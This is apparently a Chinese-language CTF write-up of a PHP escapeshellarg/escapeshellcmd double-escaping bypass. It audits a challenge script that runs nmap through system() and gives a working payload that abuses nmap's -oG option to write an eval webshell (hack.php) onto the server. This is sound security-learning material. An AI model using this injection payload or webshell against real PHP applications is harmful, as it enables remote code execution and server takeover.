前言

一个新的知识点,emmm…搞了好久,我是真的菜

知识点

​ 以下摘抄于上面的链接

  1. 传入的参数是:172.17.0.2' -v -d a=1
  2. 经过escapeshellarg处理后变成了'172.17.0.2'\'' -v -d a=1',即先对单引号转义,再用单引号将左右两部分括起来从而起到连接的作用。
  3. 经过escapeshellcmd处理后变成'172.17.0.2'\\'' -v -d a=1\',这是因为escapeshellcmd\以及最后那个不配对儿的引号进行了转义:http://php.net/manual/zh/function.escapeshellcmd.php
  4. 最后执行的命令是curl '172.17.0.2'\\'' -v -d a=1\',由于中间的\\被解释为\而不再是转义字符,所以后面的'没有被转义,与再后面的'配对儿成了一个空白连接符。所以可以简化为curl 172.17.0.2\ -v -d a=1',即向172.17.0.2\发起请求,POST 数据为a=1'

应该还可以理解?来点实例吧

escapeshellarg

var_dump(escapeshellarg("i am lz2y"));
>>> string(11) "'i am lz2y'"

var_dump(escapeshellarg("i am' lz'2y"));
>>> string(19) "'i am'\'' lz'\''2y'"
# 对单引号进行转义,然后把两边的用单引号括起来,起到连接作用

var_dump(escapeshellarg("i am ''lz2y"));
>>> string(19) "'i am '\'''\''lz2y'"
# 有没有发现如果如果某一边不能被包裹,或者为空他就会直接""

var_dump(escapeshellarg("'i am lz2y'"));
>>> string(19) "''\''i am lz2y'\'''"
# 如果某一边被两个同时包裹,他不会再加一个''
escapeshellcmd
会对& # ; ` | * ? ~ < > ^ ( ) [ ] { } $ 转义

var_dump(escapeshellcmd("i am 'lz2y"));
>>> string(11) "i am \'lz2y"
# 对单个单引号会转义

var_dump(escapeshellcmd("i am ''lz2y"));
>>> string(11) "i am ''lz2y"
# 对成对的单引号不会转义

一开始没看明白的现在也应该看明白了吧?如果还不明白…那就继续看实例吧~

Writeup

<?php

if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) {
    $_SERVER['REMOTE_ADDR'] = $_SERVER['HTTP_X_FORWARDED_FOR'];
}

if(!isset($_GET['host'])) {
    highlight_file(__FILE__);
} else {
    $host = $_GET['host'];
    $host = escapeshellarg($host);
    $host = escapeshellcmd($host);
    $sandbox = md5("glzjin". $_SERVER['REMOTE_ADDR']);
    echo 'you are in sandbox '.$sandbox;
    @mkdir($sandbox);
    chdir($sandbox);
    echo system("nmap -T5 -sT -Pn --host-timeout 2 -F ".$host);
}

代码审计…

if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) {
    $_SERVER['REMOTE_ADDR'] = $_SERVER['HTTP_X_FORWARDED_FOR'];
}

没啥用,获取信息的,看下这个

    @mkdir($sandbox);
    chdir($sandbox);

这就是创建一个文件夹,并跳转到这个文件夹里面,所以我们之后上传,写入的东西都会在这个沙箱里

$host = $_GET['host'];
$host = escapeshellarg($host);
$host = escapeshellcmd($host);
echo system("nmap -T5 -sT -Pn --host-timeout 2 -F ".$host);

这个就是我们今天学的知识点了,我们应该利用system来执行命令

nmap有一个参数-oG可以实现将命令和结果写到文件,我们应该很自然的能想到写一句话木马进去

放下payload吧

?host=' <?php @eval($_POST["lz2y"]);?> -oG hack.php '

根据前面的知识

$host = escapeshellarg($host);
>>> ''\'' <?php @eval($_POST["lz2y"]);?> -oG hack.php' \'''

$host = escapeshellcmd($host);
>>> ''\'' \<\?php @eval($_POST["lz2y"])\;\?\> -oG hack.php' \\'''

# 等价于  \<\?php @eval($_POST["lz2y"])\;\?\> -oG hack.php \\

# 根据解析规则
# 等价于  \<\?php @eval($_POST["lz2y"])\;\?\> -oG hack.php
# 写入后  <?php @eval($_POST["lz2y"]);?> -oG hack.php

成功写入一句话,在根目录就可以找到flag了

img

注意!!!这样是不行的

?host=' <?php @eval($_POST["lz2y"]);?> -oG hack.php'
>>> ''\'' \<\?php @eval($_POST["lz2y"])\;\?\> -oG hack.php'\\'''
>>> <?php @eval($_POST["lz2y"]);?> -oG hack.php\\
# 这样是不会被认为是php文件的,所以就失败了

img

参考资料

  • https://blog.csdn.net/qq_26406447/article/details/100711933

  • https://www.dazhuanlan.com/2020/03/01/5e5aef3248649/

  • https://paper.seebug.org/164/

说点什么
评论之后转圈圈也不用管,要批准之后才能显示,谢谢
支持Markdown语法
好耶,沙发还空着ヾ(≧▽≦*)o
Loading...